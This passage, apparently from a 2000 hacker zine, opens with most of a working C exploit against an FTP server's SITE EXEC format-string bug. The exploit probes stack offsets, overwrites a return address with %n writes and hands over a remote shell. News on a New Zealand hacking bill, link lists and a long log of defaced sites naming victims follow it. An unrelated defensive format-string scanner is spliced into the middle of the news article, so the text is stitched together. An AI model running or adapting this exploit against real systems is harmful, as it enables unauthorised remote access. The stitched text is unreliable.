            if(debug) puts(mbuf);
            memset(mbuf, 0, BIGBUF);
            if(debug) getchar();
        } while(opt);
        opt=1;
    }
    printf("Eat OK: %i\n", eat);

    printf("3. Calculating align...\n");
    if(debug) getchar();
    if(argc>=4) {
        sscanf(argv[3], "%i", &alin);
    } else {
        alin=ALIN;
    }
    if(force) {
        alin--;
        do {
            alin++;
            toeip=0x31313131;
            mkcode1();
            mkalin();
            send(sock,buf,strlen(buf),0);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            str=strchr(mbuf,'|');
            if(str==0) {
                printf("Unable to complete search!\n");
                exit(-1);
            }
            str[9]='\x00';
            printf("Using align: %i\n", alin);
            printf("<%s>\n\n",str);
            if(!(strncmp(str,"|31313131",9))) {
                opt=0;
            }
            memset(mbuf, 0, BIGBUF);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            memset(mbuf, 0, BIGBUF);
            if(debug) getchar();
        } while(opt);
        opt=1;
        toeip=TOEIP;
    }
    printf("Align OK: %i\n", alin);

    printf("4. Calculating inital length...\n");
    if(debug) getchar();
    if(argc>=2) {
        sscanf(argv[1], "%x", &toeip);
    } else {
        toeip=TOEIP;
    }
    if(force) {
        mkcode1();
        mkini();
        send(sock,buf,strlen(buf),0);
        c=recv(sock, mbuf, sizeof(mbuf), 0);
        if(debug) puts(mbuf);
        str=strchr(mbuf,'|');
        if(str==0) {
            printf("Unable to complete search!\n");
            exit(-1);
        }
        inicio=str - mbuf - 4;
        memset(mbuf, 0, BIGBUF);
        c=recv(sock, mbuf, sizeof(mbuf), 0);
        if(debug) puts(mbuf);
        memset(mbuf, 0, BIGBUF);
        if(debug) getchar();
    }
    printf("Start OK: %x\n", inicio);

    // It search in the remote memory!! wow!! :)
    printf("5. Searching for shellcode\n");
    if(debug) getchar();
    if(argc>=5) {
        sscanf(argv[4], "%x", &retn);
    } else {
        retn=RETN;
    }
    if(force) {
        retn-=0x40;
        do {
            retn+=0x40;
            toeip=retn;
            mkcode1();
            mksh();
            send(sock,buf,strlen(buf),0);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            str=strchr(mbuf,'|');
            if(str==0) {
                printf("Unable to complete search!\n");
                exit(-1);
            }
            str[5]='\x00';
            printf("Using ret: %x\n", retn);
            printf("<%s>\n\n",str);
            if(!(strncmp(str,"|AAAA",5))) {
                opt=0;
            }
            memset(mbuf, 0, BIGBUF);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            memset(mbuf, 0, BIGBUF);
            if(debug) getchar();
        } while(opt);
        opt=1;
    }
    printf("Address of the shellcode OK: %x\n", retn);

    printf("6. Sending attack...\n");
    if(argc>=2) {
        sscanf(argv[1], "%x", &toeip);
    } else {
        toeip=TOEIP;
    }
    status();
    if(debug) getchar();
    do {
        printf("Using Offset: %x\n", toeip);
        mkcode1();
        mkbuf();
        send(sock,buf,strlen(buf),0);
        printf("Waiting for shell...\n\n");
        term();
        printf("Logged out...\n");
        if(debug) getchar();
        printf("Reconecting...\n");
        if(debug) getchar();
        close(sock);
        fflush(stdout);
        conectar(argv[0]);
    } while(opt);
    printf("Ending...");
    if(debug) getchar();
    close(sock);
    fflush(stdout);
    exit(0);
}

void conectar(char *host)
{
    char cbuf[BUFLEN];
    int c;

    memset(cbuf, 0, BUFLEN);
    if((hp=(struct hostent *)gethostbyname(host))==NULL) {
        perror("gethostbyname()");
        exit(0);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("socket()");
        exit(0);
    }
    sa.sin_family=AF_INET;
    sa.sin_port=htons(21);
    memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
        perror("connect()");
        exit(0);
    }
    printf("Connected to %s\n",host);
    printf("Reading...\n");
    c=recv(sock, cbuf, sizeof(cbuf), 0);
    if(debug) puts(cbuf);
    if((strncmp(cbuf, "220 ", 4))==0) {
        memset(cbuf, 0, BUFLEN);
    } else {
        if((strncmp(cbuf, "220-", 4))==0) {
            memset(cbuf, 0, BUFLEN);
            c=recv(sock, cbuf, sizeof(cbuf), 0);
            if(debug) puts(cbuf);
            memset(cbuf, 0, BUFLEN);
        } else {
            printf("Wrong ftp server\n");
            exit(-1);
        }
    }
    printf(">> user ftp\n");
    sprintf(cbuf,"user ftp\n");
    write(sock,cbuf,strlen(cbuf));
    c=recv(sock, cbuf, sizeof(cbuf), 0);
    if(debug) puts(cbuf);
    if(strncmp(cbuf, "331", 3)) {
        printf("Anonymous ftp not allowed\n");
        exit(-1);
    }
    memset(cbuf, 0, BUFLEN);
    printf(">> pass %s@mail.com\n", code2);
    sprintf(cbuf,"pass %s@mail.com\n", code2);
    write(sock,cbuf,strlen(cbuf));
    c=recv(sock, cbuf, sizeof(cbuf), 0);
    if(debug) puts(cbuf);
    if((strncmp(cbuf, "230 ", 4))==0) {
        memset(cbuf, 0, BUFLEN);
    } else {
        if((strncmp(cbuf, "230-", 4))==0) {
            memset(cbuf, 0, BUFLEN);
            c=recv(sock, cbuf, sizeof(cbuf), 0);
            if(debug) puts(cbuf);
            memset(cbuf, 0, BUFLEN);
        } else {
            printf("Wrong password\n");
            exit(-1);
        }
    }
    printf("Logged\n");
}

void term(void)
{
    char sbuf[BUFLEN];
    fd_set rfds;
    int x;

    sprintf(sbuf, "QUIT\nuname -a; id;\n");
    send(sock, sbuf, strlen(sbuf), 0);
    while (1) {
        FD_ZERO(&rfds);
        FD_SET(0, &rfds);
        FD_SET(sock, &rfds);
        if(select((0 > sock ? 0 : sock) + 1, &rfds, NULL, NULL, NULL) < 1)
            return;
        if(FD_ISSET(sock, &rfds)) {
            if((x = read(sock, sbuf, sizeof(sbuf))) < 1)
                return;
            write(0, sbuf, x);
        }
        if(FD_ISSET(0, &rfds)) {
            if((x = read(0, sbuf, sizeof(sbuf))) < 1)
                return;
            write(sock, sbuf, x);
        }
    }
}

void mkcode1(void)
{
    int i;
    int c;

    memset(code1,0x30,40);
    i=alin;
    for(c=0;c<4;c++) {
        code1[i]=(toeip & 0xff);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=(toeip & 0xff);
        }
        i++;
        code1[i]=((toeip & 0xff00) >> 8);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=((toeip & 0xff00) >> 8);
        }
        i++;
        code1[i]=((toeip & 0xff0000) >> 16);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=((toeip & 0xff0000) >> 16);
        }
        i++;
        code1[i]=((toeip & 0xff000000) >> 24);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=((toeip & 0xff000000) >> 24);
        }
        i=i+5;
        toeip++;
    }
    i=i-4;
    code1[i]='\x00';
}

void mkbuf(void)
{
    char *ptr = buf;
    int r1, r2, r3, r4;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < strlen(code1);i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat; i++) {
        sprintf(ptr, "%%.f");
        ptr = &buf[strlen(buf)];
    }
    r1 = (retn & 0xff);
    r1 |= ((inicio & 0xff00) + 0x100);
    sprintf(ptr,"%%.%dd", r1 - inicio);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%n");
    ptr = &buf[strlen(buf)];
    r2 = (retn & 0xff00) >> 8;
    r2 |= ((inicio & 0xff00) + 0x200);
    sprintf(ptr,"%%.%dd", r2 - r1);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%n");
    ptr = &buf[strlen(buf)];
    r3 = (retn & 0xff0000) >> 16;
    r3 |= ((inicio & 0xff00) + 0x300);
    sprintf(ptr,"%%.%dd", r3 - r2);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%n");
    ptr = &buf[strlen(buf)];
    r4 = (retn & 0xff000000) >> 24;
    r4 |= ((inicio & 0xff00) + 0x400);
    sprintf(ptr,"%%.%dd", r4 - r3);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%n");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%s",code3);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

void mkini(void)
{
    char *ptr = buf;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < strlen(code1);i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat; i++) {
        sprintf(ptr, "%%.f");
        ptr = &buf[strlen(buf)];
    }
    sprintf(ptr,"|");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x-");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

void mkalin(void)
{
    char *ptr = buf;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < strlen(code1);i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat; i++) {
        sprintf(ptr, "%%.f");
        ptr = &buf[strlen(buf)];
    }
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"|");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

void mksh(void)
{
    char *ptr = buf;
    int r1, r2, r3, r4;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < strlen(code1);i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat; i++) {
        sprintf(ptr, "%%.f");
        ptr = &buf[strlen(buf)];
    }
    r1 = (retn & 0xff);
    r1 |= ((inicio & 0xff00) + 0x100);
    sprintf(ptr,"%%.%dd", r1 - inicio);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"|%%s");
    ptr = &buf[strlen(buf)];
    r2 = (retn & 0xff00) >> 8;
    r2 |= ((inicio & 0xff00) + 0x200);
    sprintf(ptr,"%%.%dd", r2 - r1 - 1);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    r3 = (retn & 0xff0000) >> 16;
    r3 |= ((inicio & 0xff00) + 0x300);
    sprintf(ptr,"%%.%dd", r3 - r2 - 1);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    r4 = (retn & 0xff000000) >> 24;
    r4 |= ((inicio & 0xff00) + 0x400);
    sprintf(ptr,"%%.%dd", r4 - r3 - 1);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%s",code3);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

void status(void){
    printf("[ Using values: offset=%x eat=%i align=%i add=%x inicio=%x ]\n",
           toeip, eat, alin, retn, inicio);
}

// By The Dark Raver

@HWA

349.0 [IND] Nov 2000 : Opposition to New Zealand hacking bill mounts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.newsbytes.com/news/00/158161.html

By Adam Creed, Newsbytes
WELLINGTON, NEW ZEALAND, 15 Nov 2000, 12:23 AM CST

The New Zealand Greens political party has voiced its opposition to a planned amendment to the country's crime bill that could allow security services to hack into citizens' computers and intercept e-mail and faxes.

The long-awaited legislation is mainly intended to criminalize computer hacking in New Zealand. The country has been without specific legislation outlawing malicious hacking.

While supporting the main thrust of the planned laws, the Greens do not want to support a law that also gives the police and security services the right to hack into computers and intercept e-mail and faxes.

"We won't support interception powers for state agencies, which in the electronic area would be a considerable assault on people's privacy," said a Greens spokesperson, adding that such new powers would be much more open to abuse.

"There are serious doubts that such interception would do much to catch criminals," he added. "Real villains can easily avoid detection through using disguised language, encryption, temporary Hotmail addresses, rerouters and unlisted mobile phones. Therefore the cost to public privacy might greatly outweigh the beneficial effect of catching more criminals."

He said that "misuse" of the world-wide Echelon interception network already illustrated the potential for privacy violations.
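Back to the fx9.c exploit above: every probe string it builds is a plain printf conversion smuggled into the SITE EXEC argument, which is exactly what a defender can key on. The C below is an added example, not code from the zine, from wu-ftpd or from The Dark Raver: it scans an untrusted command argument for conversion directives the way a log filter or a patched server would, grades the result, and shows the hardened call that passes the string as "%s" data so nothing inside it is interpreted. All function and struct names are mine, and the sample arguments are constructed.

```c
/* Format-directive scanner for untrusted FTP command arguments, plus the
 * hardened logging pattern.  Added example, not wu-ftpd or fx9.c code;
 * the sample arguments below are constructed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Parse one printf-style directive starting at s (s[0] == '%').
 * Returns the conversion character and stores the bytes consumed in *len;
 * returns 0 when the directive is malformed (e.g. a trailing '%'). */
static char parse_directive(const char *s, size_t *len)
{
    const char *p = s + 1;
    if (*p == '%') { *len = 2; return '%'; }                     /* literal */
    while (*p && strchr("-+ #0", *p)) p++;                       /* flags */
    while (*p && (isdigit((unsigned char)*p) || *p == '*')) p++; /* width */
    if (*p == '.') {                                             /* precision */
        p++;
        while (*p && (isdigit((unsigned char)*p) || *p == '*')) p++;
    }
    while (*p && strchr("hlLqjzt", *p)) p++;                     /* length */
    if (!*p || !strchr("diouxXeEfFgGaAcspn", *p)) return 0;
    *len = (size_t)(p - s) + 1;
    return *p;
}

struct fmt_report {
    int conversions;   /* directives that consume a stack slot (%x, %.f, ...) */
    int writes;        /* %n directives: the only way a format bug writes memory */
    int pointer_reads; /* %s / %p: dereference a value taken off the stack */
};

/* Scan an untrusted string for printf conversions.  "%%" is not counted. */
struct fmt_report scan_format_directives(const char *s)
{
    struct fmt_report r = {0, 0, 0};
    size_t len;
    while ((s = strchr(s, '%')) != NULL) {
        char conv = parse_directive(s, &len);
        if (conv == 0) { s++; continue; }        /* malformed: skip the '%' */
        if (conv != '%') {
            r.conversions++;
            if (conv == 'n') r.writes++;
            if (conv == 's' || conv == 'p') r.pointer_reads++;
        }
        s += len;
    }
    return r;
}

/* Risk grade for a SITE EXEC argument: 0 clean, 1 stack-read probe,
 * 2 memory-write attempt.  A legitimate argument carries no conversions. */
int site_exec_risk(const char *arg)
{
    struct fmt_report r = scan_format_directives(arg);
    if (r.writes) return 2;
    if (r.conversions) return 1;
    return 0;
}

/* Hardened pattern: the untrusted string is an ARGUMENT to a fixed "%s"
 * format, never the format itself, so its directives are copied verbatim. */
int safe_log_line(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, "SITE EXEC arg: %s", untrusted);
}

/* Self-check: the hardened call must carry "%n" through untouched. */
int safe_log_is_inert(void)
{
    char out[64];
    safe_log_line(out, sizeof out, "%n%n");
    return strcmp(out, "SITE EXEC arg: %n%n") == 0;
}

int main(void)
{
    /* constructed samples, shaped like the exploit's eat / align / %n phases */
    const char *samples[] = {
        "ls -l",
        "%.f%.f%.f%.f%x|%x",
        "AAAA%.f%.f%.300d%n%.200d%n",
    };
    char line[256];
    for (size_t i = 0; i < 3; i++) {
        safe_log_line(line, sizeof line, samples[i]);
        printf("risk=%d  %s\n", site_exec_risk(samples[i]), line);
    }
    return 0;
}
```

Note that "% d" (space flag) is a valid directive, so an argument such as "100% done" is graded 1: that is the same reading printf itself would give it, which is the point of scanning with a real directive parser rather than a substring match.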
Information Minister Paul Swain responded to criticism of the proposed laws by calling for elected representatives to pass a motion that would table the amendment first. He said there would be time to debate the proposed laws when the Bill is referred back to Parliament.

"However the overarching purpose of this (amendment) is to make hacking illegal in New Zealand - I think that is vital for every New Zealander who owns a computer. We need to send a strong message that hacking is not cool, it is not clever, it is a serious crime," Swain added.

Reported By Newsbytes.com, http://www.newsbytes.com . 00:23 CST

@HWA

999.9 [HWA] sp00ge! The hidden track. (Free stuff, tips and s3kr3t urls and shit)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Here's some cool urls, tips tricks and other shit that doesn't fit elsewhere.

http://www.phonefree.com/ - Free calls pc-phone within us and pc-pc worldwide, also video and pay extra feature options and offers on hardware (headsets etc) check it.

http://www.dialpad.com/ - Free calls pc-phone anywhere us <-> us sign up from anywhere in the world (use a US address) and make calls to anywhere in the US so its great for foreign users wanting to call US destinations for free over the net.. ;)

Not much here, I held back a lot of goodies for the next issue, watch this space for 'secret' sites and hints and tip sites. - Ed

@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

§¤*~`~*¤§|§¤*~`~*¤§[ promo ur site or peddle ]§¤*~`~*¤§|§¤*~`~*¤§

ADVERTISING IS FREE TRY AND BE CREATIVE, HWA RESERVES RIGHT TO IGNORE YOUR REQUEST (THIS NEVER HAPPENS) READ BELOW FOR .COMS, SEND YOUR ADS TO CRUCIPHUX@DOK.ORG

§¤*~`~*¤§|§¤*~`~*¤§[ your product... ]§¤*~`~*¤§|§¤*~`~*¤§

Ads run for ever or until i get sick of looking at them or they die or whatever. Commercial advertising is welcome we are read by several thousand people each issue, higher than some print publications. Payment is required for commercial ads, this can be monetary (cheque or money order made out to CASH sent to the mail drop listed earlier in the zine) or promo goodies or * merchandise, we would also be interested in acquiring sponsors to promote and fund a Hacker/Security CON in the Southern Ontario Canada area since most cons are south of the border and a Canadian con is LONG overdue.

* Security/COMSEC/IT Networking/Internet related - cruciphux@dok.org

§¤*~`~*¤§|§¤*~`~*¤§[ suck a sore buck ]§¤*~`~*¤§|§¤*~`~*¤§

"Nice boy, but as sharp as a sack of wet mice."
-- Foghorn Leghorn

CUBESOFT COMMUNICATIONS IS A PROUD SPONSOR OF THIS PUBLICATION

 * www.csoft.net webhosting, shell, unlimited hits bandwidth ...
 * www.csoft.net www.csoft.net www.csoft.net www.csoft.net
 * http://www.csoft.net/
 * One of our sponsors, visit them now

 * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM

@HWA

HA.HA Humour and puzzles ...etc
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Don't worry. worry a *lot*

SITE.1

-=- Fun =-

http://www.howtoandroid.com/HowToBuildRobotHead.html
Just go look :) ... - Ed

-=- Hack/Security -=-

http://root66.nl.eu.org {} (aka Frank)
Cool site!, check it out, complete with interactive 'shell' to the root66 box...a must see. - Ed

-=- Tech/General -=-

http://www.uk.research.att.com/vnc/
Got windows and need remote admin? check this out...non commercial.

http://users.javanet.com/~alden/indexa.html phluid (phluid@mindless.com)
Just stumbled across this and what a sweet looking site, you have to check it out just to dig the layout/graphics. Very nice, content? well have a look around, but do check it out ... - Ed

http://www.securax.org/ (Belgium/Dutch) Submitted by: Zoa_Chien
Nice site, well laid out but unfortunately for many of us it's not in English :( ...
check it out all the same, news, exploits, latest file list from packetstorm, HNN affiliate etc.. - Ed

-=- Telephony -=-

http://twpyhr.usuck.com . Jenny
Very interesting site for the telephone enthusiast, has lots of rare and entertaining recordings of phone system screwups and general messages/announcements etc, worth checking out, also check out the answering machine OGM collection :-) fun stuff. - Ed

-=- Employment/Skill testing -=-

http://www.brainbench.com/
Check out this site, test your sysadmin skills, even get certified online! post your stats to an online database and give the url to potential employers etc, lots of services ... a must see. - Ed

http://cgisecurity.com/
Fledgling security site dealing with cgi and www vulnerabilities run by Zenomorph, very good site, much promise, lots of advisories and info well worth a visit if you admin a website. - Ed

You can Send in submissions for this section too if you've found (or RUN) a cool site...

@HWA

H.W Hacked websites
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|L|4|t|E|S|T|_|W|3|B|_|D|E|F|A|C|E|M|E|N|T|S|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Muse: so where are the hacks with a point? defacing is synonymous with teenagers spray bombing urban walls with logos and gang colours it seems...what happened to HARP?
(Enter GForce)

* Hackers Against Racist Propaganda (See issue #7)

[A = Articles accompany mirror]--[M = 'mass' hack]--[C = 'message' in HTML comments]--[K = Free Kevin reference]

November 2000

Date       OS Group/Person      AMCK Site
~~~~       ~~ ~~~~~~~~~~~~      ~~~~ ~~~~
[00.11.03] IR [GForce Pakistan] Pf1 Systems Ltd. (www.pf1.co.il) [00.11.03] NT [rewben] the hehe.com e-mail service (www.hehe.com) [00.11.03] NT [rewben] Quantum Computer Services (www.myownemail.com) [00.11.03] Li [ipx] casemiro.castroalves.br (casemiro.castroalves.br) [00.11.03] NT [m0r0n] Yizrael Valley College (Mihlelet Emek Yizrael) (www.yvc.ac.il) [00.11.03] So [GForce Pakistan] Jewish Bible Association (www.jewishbible.org) [00.11.03] NT [predator] MC www.bos.cg.yu (www.bos.cg.yu) [00.11.02] NT [t3aM dANk] AMT (shop.amt1st.com) [00.11.02] NT [bunny] C www.motormarkt.nl (www.motormarkt.nl) [00.11.02] NT [WeB Claws] M www.costruzionesiti.com (www.costruzionesiti.com) [00.11.02] 2K [Lord Choo3s] FORIX - Formula One Results and Information eXplorer (www.forix.com) [00.11.02] So [Havoc Korp] Ravenous Groove Productions (www.ethereality.com) [00.11.02] Lr [EVIL ANGELICA] www.war247.com (www.war247.com) [00.11.02] Lr [CyBeRpUnK] MC SICA, S.A. DE C.V. (www.asofarma.com.mx) [00.11.02] Lr [Blitz] SimTel Computers DBA (www.simtelcomputers.com) [00.11.02] Lr [DeTH] SCM Labs, Inc. 
(www.scmlabs.com) [00.11.02] [Pakistan HC] The American Israel Public Affairs Committee (www.aipac.org) [00.11.02] 2K [grape/squirl] Arizona K12 Schools (ww2.chandler.k12.az.us) [00.11.02] Li [] Robert Essery (www.whyamisick.com) [00.11.02] Sc [RSH] M Cybernet (www.cybernetinc.net) [00.11.02] NT [Anti Security] Governo do Estado da Paraiba (ntiserv1.saude.pb.gov.br) [00.11.02] NT [m0r0n/nightman] Shenkar College (www.shenkar.ac.il) [00.11.02] NT [rewben] M www.wannahaves.nl (www.wannahaves.nl) [00.11.02] NT [m0r0n/nightman] Seminar Hakibutzim (www.smkb.ac.il) [00.11.01] So [Havoc Korp] Royal Jordainian Web Site (www.rja.com.jo) [00.11.01] NT [TheKillers] Marshall Informatica S/C Ltda (www.marshall.com.br) [00.11.01] Li [keoki] M Silverton Chamber of Commerce (www.silverton.org) [00.11.01] NT [azndragon] C CIS, University of Bologna (www.cis.unibo.it) [00.10.31] NT [McM4nus] Banco Sudameris Brasil (Jarvis Entertainment Group (Total mirrors count.. Date OS Group/Person AMCK Site 2000 ~~~~ ~~ ~~~~~~~~~~~~ ~~~~ ~~~~ ~~~~~~~~ [00.07.13] NT [team legacy] O'Connor, Piper & Flynn (www.opf.com) [00.07.13] Li [SJ/bighawk] STACK Systems Co. Ltd (www.stacksystems.co.jp) [00.07.13] Li [RSH] Apollo Dayton (www.apollodayton.com) [00.07.13] NT [ov3rh4zz4rd] ActivityBoard.com (activityboard.com) [00.07.13] NT [] Cox Fibernet (www.coxinet.net) [00.07.13] NT [digital insanity] Maritime Telecommunications Network (www.mtnsat.com) [00.07.13] NT [team legacy] Fordham University (www.fordham.edu) [00.07.12] NT [team legacy] Virginia State University (www.vsu.edu) [00.07.12] NT [d00d00 kr3w] Vaamonde Comunicaciones S.L. 
(www.bornet.edu) [00.07.12] NT [d00d00 kr3w] Temple University (www.cspd.temple.edu) [00.07.12] NT [Papi/ICKIS] Servicio de Comunicacion en Linea (www.obsession.com.mx) [00.07.12] NT [cyb3r fuck3rs] Universidade de Sorocaba (www.uniso.br) [00.07.11] NT [x-s4nd3r] Ejército de Guatemala (www.mindef.mil.gt) [00.07.11] NT [team legacy] Boone County Public Library (www.bcpl.org) [00.07.11] So [Gforce Pakistan] Fermi National Accelerator Laboratory (d0sunmsu1.fnal.gov) [00.07.11] Li [RLC] Bellevue Tech (www.bellevuetech.com) [00.07.11] So [Gforce Pakistan] Fermi National Accelerator Laboratory 'cdsun2' Server (cdsun2.fnal.gov) [00.07.11] So [Gforce Pakistan] Fermi National Accelerator Laboratory (fncduh.fnal.gov) [00.07.11] NT [HCI] University of Essex (www2.essex.ac.uk) [00.07.11] Li [SJ/bighawk] Digital Media Interativa Comercio e Servicos (www.dmz.com.br) [00.07.11] NT [] North Dakota Supreme Court Home Page (www.court.state.nd.us) [00.07.11] NT [] Secretaria de Desarrollo Agropecuario y Pesquero (www.sedapver.gob.mx) [00.07.11] Ir [NuRaIn-ShAiKh] Big Buddies (www.bigbuddies.com) [00.07.11] La [datagram] Arisu Media Co,. Ltd (www.arisu.co.kr) [00.07.11] NT [Papi and ICKIS] Servicio de Comunicación en Línea (www.prestige.com.mx) [00.07.10] NT [Crime Boys] Gonzaga & Neves Ltda (www.atmnet.com.br) [00.07.10] NT [Crime Boys] www.dgdrural.pt (www.dgdrural.pt) [00.07.10] So [GForce Pakistan] Fermi National Accelerator Laboratory Cmstst Server (cmstst1.fnal.gov) [00.07.10] NT [SuBZeRo] Campus Colima (www.col.itesm.mx) [00.07.10] Su [SuBZeRo] Lazelle Street Land Company (www.sturgisrally.net) [00.07.10] Lu [Ben T] Aegis (www.kjofol.org) [00.07.10] NT [do0do0 krew] University of Texas at Brownsville and Texas Southmost College (www.utbtsc.edu) [00.07.10] BI [Team Holocaust] Owl Kaufpark (www.owl-kaufpark.de) [00.07.10] NT [Team Holocaust] Lance K Hofer (www.lkh.com) [00.07.10] NT [McM4nus] Inst. 
Brasileiro da Qualidade e Produtividade (www.ibqppr.org.br) [00.07.10] BI [Team Holocaust] AHG Handels-GmbH (www.ahg-art.com) [00.07.10] BI [Team Holocaust] M Dirk Gross (Elfenwald) (www.elfenwald.de) [00.07.10] BI [Team Holocaust] DV Controlling (Hombergen) (www.hombergen.de) [00.07.10] NT [McM4nus] Fundacao Estudar (www.estudar.org.br) [00.07.10] NT [Team Holocaust] Covenant Health (www.covenanthealth.com) [00.07.10] NT [cyb3r fuck3rs] Ass. Comunicacao Educativa Roquette Pinto (www.tvebrasil.com.br) [00.07.10] NT [cyb3r fuck3rs] Ministerio Do Meio Ambiente (www2.mma.gov.br) [00.07.10] NT [cyb3r fuck3rs] Ass. Comunicacao Educativa Roquette Pinto (www.radiomec.com.br) [00.07.09] NT [Anti Security] Carolina Panthers (www.panthers.com) [00.07.09] NT [MADMAN] Civil Aviation Safety Authority (www.casa.gov.au) [00.07.09] NT [id3nt] Music (TW) (www.music.com.tw) [00.07.09] NT [Team Holocaust] Lyric Opera Cleveland (www.lyricoperacleveland.org) [00.07.09] Lr [GForce Pakistan] ISI Home Page (www.isical.ac.in) [00.07.09] Bf [Crime Boys] Mario Gilberto Eichler Jznior (www.cybernegocios.com.br) [00.07.09] NT [Team Holocaust] Victory Sports Marketing Corp (www.ad-network.com) [00.07.09] Li [Gforce Pakistan] Luv India (www.luvindia.com) [00.07.09] NT [suPosix] Industria De Produtos Alimenticios Cory Ltda (www.icekiss.com.br) [00.07.09] Li [Gforce Pakistan] M Bollywood Pages (www.bollywoodpages.com) [00.07.09] NT [Team Holocaust] University Heights (www.universityheights.com) [00.07.09] NT [x-s4nd3r] Parlamentsdienste Informatikdienst (www.parliament.ch) [00.07.09] NT [:0)] US Small Business Classroom (classroom.sba.gov) [00.07.09] NT [M3L40] www.anticorrupcion.gov.co (www.anticorrupcion.gov.co) [00.07.09] NT [SuBZeRo] Central Association of Southern Baptists (www.source1.org) [00.07.09] NT [Team Holocaust] Web Service (www.web-service.com) [00.07.08] Li [Crime Boys] Claudionor Ramos Advocacia E Consultoria Empresari (www.webmultas.com.br) [00.07.08] Ir [El Pulpo] Prodima Alta 
Tecnologia (www.prodaltec.com) [00.07.08] NT [HC Pakistan] Unsigned UK - Resource for UK Bands (www.unsigneduk.com) [00.07.08] Lr [Jfs] #2 Openhack -- eWEEK Hacking Challenge (www.openhack.com) [00.07.08] NT [HackersCrew] MBK Media (www.mbkmedia.com) [00.07.08] So [Gforce Pakistan] Convergent Systems (www.tems.com.sg) [00.07.08] So [Gforce Pakistan] Mail Nexus (www.mailnexus.com) [00.07.08] Lr [] I Wanna Know (www.iwannaknow.org) [00.07.08] Lr [kortex] American Social Health Association (www.ashastd.org) [00.07.08] So [Gforce Pakistan] Department of Health and Human Services (vault1.acf.dhhs.gov) [00.07.08] Bi [DHC] Rubber Snake (www.rubbersnake.com) [00.07.08] Lr [DHC] Cyber Golf (www.cybergolf.org) [00.07.08] So [artech] Amevic (www.alzheimer-montpellier.org) [00.07.08] Lr [Napalm Death] Happy Web! (www.happy-web.org) [00.07.08] NT [SuBZeRo] Kumho Engineering company, Limited (www.kumhoeng.co.kr) [00.07.08] NT [SuBZeRo] Electronic Display Industrial Research Association (www.edirak.or.kr) [00.07.08] NT [M3L4O] Poli BR (www.poli.usp.br) [00.07.08] NT [M3L4O] CRA Gov (CO) (www.cra.gov.co) [00.07.07] Lr [shitkingz] M Sebastian Fiebiger & Tobias Stober (www.fs-gbr.com) [00.07.07] NT [] Cookbooks On/Line, Inc 